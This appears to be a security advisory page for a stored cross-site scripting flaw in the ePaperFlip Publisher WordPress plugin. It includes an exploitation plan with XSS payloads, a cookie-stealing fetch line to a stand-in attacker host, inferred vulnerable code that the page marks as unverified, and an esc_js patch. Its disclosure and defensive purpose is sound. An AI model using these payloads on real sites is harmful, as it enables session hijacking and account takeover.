CVE-2026-7662

ePaperFlip Publisher <= 1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'publicationid' Shortcode Attribute

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The ePaperFlip Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'publicationid' attribute of the `epaperflip_embed` shortcode in all versions up to, and including, 1. This is due to insufficient input sanitization and output escaping on the shortcode attribute which is injected directly into inline JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1
PublishedJune 8, 2026
Last updatedJune 9, 2026
Affected pluginepaperflip-publisher
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-7662 (ePaperFlip Publisher) ## 1. Vulnerability Summary The **ePaperFlip Publisher** plugin (<= 1) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `epaperflip_embed` shortcode handler. Sp…

Show full research plan

Exploitation Research Plan: CVE-2026-7662 (ePaperFlip Publisher)

1. Vulnerability Summary

The ePaperFlip Publisher plugin (<= 1) is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting (XSS). The vulnerability exists within the epaperflip_embed shortcode handler. Specifically, the publicationid attribute is accepted from the user and subsequently rendered within an inline JavaScript block on the frontend without sufficient sanitization or output escaping (e.g., using esc_js() or wp_json_encode()). This allows a Contributor-level user to inject arbitrary JavaScript that executes in the context of any user (including Administrators) who views the post or page containing the shortcode.

2. Attack Vector Analysis

  • Endpoint: wp-admin/post.php and wp-admin/post-new.php (Standard WordPress post/page editor).
  • Shortcode: [epaperflip_embed]
  • Vulnerable Attribute: publicationid
  • Payload Carry: The payload is embedded within the post_content parameter of the post creation/update request.
  • Authentication: Required (Contributor-level or higher).
  • Preconditions: The plugin must be active. The attacker must have the capability to edit_posts.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the shortcode in the main plugin file or an initialization class:
    add_shortcode( 'epaperflip_embed', 'epaperflip_shortcode_callback' ); (inferred function name).
  2. Processing: When a post is rendered, do_shortcode() calls the callback function.
  3. Attribute Extraction: The callback uses shortcode_atts() to extract the publicationid.
  4. Sink: The callback generates HTML containing a <script> tag. The publicationid is concatenated directly into a JavaScript string or variable assignment:
    return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; ... </script>";
  5. Execution: The browser renders the page, parses the inline script, and executes the injected payload because the string was not escaped to prevent breakout (e.g., using '; alert(1); //).

4. Nonce Acquisition Strategy

This vulnerability is triggered via the standard WordPress post editor. To automate the exploitation, we need the nonces required to create or edit a post.

  1. Step 1: Authenticate as a Contributor user using http_request or browser_navigate.
  2. Step 2: Navigate to wp-admin/post-new.php.
  3. Step 3: Use browser_eval to extract the required nonces and post data:
    • _wpnonce: The nonce for creating/saving the post.
    • user_id: The ID of the current user.
    • _wp_http_referer: The referer path.
  4. Step 4: If the plugin provides a custom "Insert ePaper" button that uses AJAX, check for a localized object:
    • browser_eval("window.epaperflip_admin_data?.nonce") (inferred JS key).

5. Exploitation Strategy

Step 1: Create a Post with the XSS Payload

The goal is to break out of the JavaScript variable assignment and execute arbitrary code.

Request:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/post.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: editpost
    • post_ID: [POST_ID]
    • _wpnonce: [EXTRACTED_NONCE]
    • post_title: XSS Test
    • content: [epaperflip_embed publicationid="';alert(document.domain);//"]
    • post_status: publish

Step 2: Trigger the Payload

  • Navigate to the permalink of the newly created post.
  • The inline script will render as:
    <script> var pubId = '';alert(document.domain);//'; ... </script>

6. Test Data Setup

  1. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  2. Plugin Activation:
    wp plugin activate epaperflip-publisher
  3. Post Template:
    Create an initial draft to get a post_ID:
    wp post create --post_type=post --post_status=draft --post_title="Draft" --post_author=[ATTACKER_ID]

7. Expected Results

  • When an Administrator or any user visits the post, a JavaScript alert box showing the document domain should appear.
  • In a real-world scenario, the payload would be changed to exfiltrate cookies:
    publicationid="';fetch('http://attacker.com/log?c='+document.cookie);//"

8. Verification Steps

  1. Verify Post Content:
    wp post get [POST_ID] --field=post_content
    Confirm it contains the exact shortcode string.
  2. Verify Frontend Output:
    Use http_request to fetch the post URL and check the response body:
    grep -P "<script.*publicationid.*alert"
  3. Check Database:
    wp db query "SELECT post_content FROM wp_posts WHERE ID = [POST_ID]"

9. Alternative Approaches

  • Attribute Breakout: If the attribute is rendered inside an HTML attribute instead of a script tag (e.g., <div data-id="VAL">), the payload should be:
    publicationid='"><img src=x onerror=alert(1)>'
  • JS String Contexts: If the injection is inside a double-quoted JS string:
    publicationid='";alert(1);//'
  • JSON Context: If the plugin uses wp_localize_script to pass the ID (unlikely given the "inline JavaScript" description), the XSS might be DOM-based in the plugin's .js files. In this case, examine how the script handles the localized variable.
Research Findings
Static analysis — not yet PoC-verified

Summary

The ePaperFlip Publisher plugin for WordPress is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the 'publicationid' attribute of its 'epaperflip_embed' shortcode. This occurs because the plugin fails to sanitize or escape the attribute before injecting it directly into an inline JavaScript block on the frontend.

Vulnerable Code

// Inferred from research plan: epaperflip-publisher.php (approximate line numbers)
function epaperflip_shortcode_callback( $atts ) {
    $atts = shortcode_atts( array( 'publicationid' => '' ), $atts );
    // The publicationid is concatenated directly into a JavaScript string context
    return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; </script>";
}

Security Fix

--- epaperflip-publisher.php
+++ epaperflip-publisher.php
@@ -10,3 +10,3 @@
     $atts = shortcode_atts( array( 'publicationid' => '' ), $atts );
-    return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; </script>";
+    return "<script type='text/javascript'> var pubId = '" . esc_js( $atts['publicationid'] ) . "'; </script>";

Exploit Outline

To exploit this vulnerability, an attacker with at least Contributor-level privileges (edit_posts capability) creates or edits a post or page. In the post editor, the attacker inserts the 'epaperflip_embed' shortcode and includes a malicious payload in the 'publicationid' attribute. The payload is designed to break out of the JavaScript string variable assignment (e.g., using a closing quote and semicolon) and then execute arbitrary JavaScript code. When any user, including an administrator, views the published post, the injected script will execute in their browser session, potentially allowing for session hijacking or further administrative actions.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.